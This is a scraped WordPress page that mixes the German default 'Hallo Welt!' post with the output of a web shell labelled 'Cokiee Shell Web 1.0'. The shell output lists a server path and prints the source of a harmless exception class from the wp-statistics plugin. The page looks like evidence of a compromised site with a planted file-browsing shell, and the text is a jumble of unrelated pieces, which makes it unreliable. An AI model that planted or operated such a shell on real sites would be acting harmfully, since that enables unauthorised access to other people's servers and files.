Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web28/html/wp-content/plugins/wp-statistics/src/Exception/ |
Current File : //var/www/web28/html/wp-content/plugins/wp-statistics/src/Exception/LicenseException.php |
<?php namespace WP_Statistics\Exception; use Exception; class LicenseException extends Exception { private $status; public function __construct($message, $status = '', $code = 0, $previous = null) { parent::__construct($message, $code, $previous); $this->status = $status; } public function getStatus() { return $this->status; } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare